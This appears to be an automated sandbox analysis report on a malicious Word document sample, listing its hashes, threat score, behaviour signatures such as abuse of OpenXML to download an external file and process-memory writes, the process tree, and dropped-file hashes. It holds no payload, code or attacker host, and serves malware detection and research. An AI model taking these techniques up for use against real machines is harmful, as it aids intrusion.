Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-06-2024 13:48

General

  • Target

    1639529b874fd4542fe764723a409756_JaffaCakes118.doc

  • Size

    242KB

  • MD5

    1639529b874fd4542fe764723a409756

  • SHA1

    e9b5c172ebe286d1c9f86f728491b789dd0198da

  • SHA256

    3598a4e8f79938a5e94f6c7274d60d0f4670dc73856243ffd915c56094db2126

  • SHA512

    ac574977a296574501e09ad4ce1821e698667b2fa3f088de5313f6edd74d966cfef5f4e9ec60698c0d6d5b18d745be5a893490eba3bfc0cb3df69fc9a0e6c4b9

  • SSDEEP

    1536:9terTkw9HnXPJguq73/IKB5Kby0gchHrTPryiK/dRYpmXWDapCi9iy:9vw9HXPJguq73/IKBWy6ydS0GDk5N

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1639529b874fd4542fe764723a409756_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2580
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F92216A0-9F59-4D86-B886-9EBA6D76F436}.FSD

      Filesize

      128KB

      MD5

      4bc3d3841c5d1e2d12a5e0ee490d713e

      SHA1

      fa5c7eacef3c88ef8d3e87cbce52d5cabefdfc68

      SHA256

      453e10c95ce936c5ee1821c7403daedd75ac4c1f1dd6883027c91f02c0e0e03b

      SHA512

      36f49d5a0319207b64c7c7b6a809de5176e954459fb33034ef82e265c2c5e303d98326d6e5231ca6da6911054f557945b0205bd5b74d6a6385f4baafcdb214e5

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      6c91105c6f60d093670c6c934c1f6858

      SHA1

      ed7be9e6267ffe8b06172a18abf5478a1300642e

      SHA256

      d57d58a8cbac11cb976e7c2bc6a235d53d9ee1373130ee0a9969a71725a9b980

      SHA512

      e722864624bae01892a498799ea4a9ea077b4107cf284b9067702dc0bb67f0325b6fcbcd8d0f2d42b6ca1dc0c1635795ad0a1a2ac97ea6e300aa872a699531dc

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0CA23DBE-6815-42E1-90BB-EF4BC8EFE50C}.FSD

      Filesize

      128KB

      MD5

      77e9c47ada574d7c34a4ab6f7c4b192e

      SHA1

      a6edf091bc8923de2f5c4bab4be0eda4f9d0a8d3

      SHA256

      faca9cc965bf2951116bcd5e993941386d558136beab43946da69d011fcdf363

      SHA512

      0e4fc789f99a0d63c85033d02888199fb98608685c083effc3d2f66c90697394906e931626265c712647bab22612d783e00168b05af0d5b121c03268b4907fb1

    • C:\Users\Admin\AppData\Local\Temp\{4C046931-6DCF-41B6-8010-EBE6B20F22E4}

      Filesize

      128KB

      MD5

      561a66a2143f7992dae6f7b3813645f0

      SHA1

      259d557f7bdcd36a0fb9ce4070a32c210c03acad

      SHA256

      277dcf2c1d70ec5f490578ee0f8dc917cc53e14076c95253a369e483e9a3afe4

      SHA512

      9992fdad89138fdd9350157d16652ec953233894feeddfb9c0e06e19da74a1df432ce93b8b7fba647e3ddecef55e639e3e8b2d05bea0c106671df05f32696a88

    • memory/2820-0-0x000000002F891000-0x000000002F892000-memory.dmp

      Filesize

      4KB

    • memory/2820-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2820-2-0x000000007179D000-0x00000000717A8000-memory.dmp

      Filesize

      44KB

    • memory/2820-11-0x000000007179D000-0x00000000717A8000-memory.dmp

      Filesize

      44KB

    • memory/2820-61-0x0000000004430000-0x0000000004530000-memory.dmp

      Filesize

      1024KB

    • memory/2820-62-0x000000000F9B0000-0x000000000FAB0000-memory.dmp

      Filesize

      1024KB

    • memory/2820-517-0x0000000004430000-0x0000000004530000-memory.dmp

      Filesize

      1024KB

    • memory/2820-518-0x000000000F9B0000-0x000000000FAB0000-memory.dmp

      Filesize

      1024KB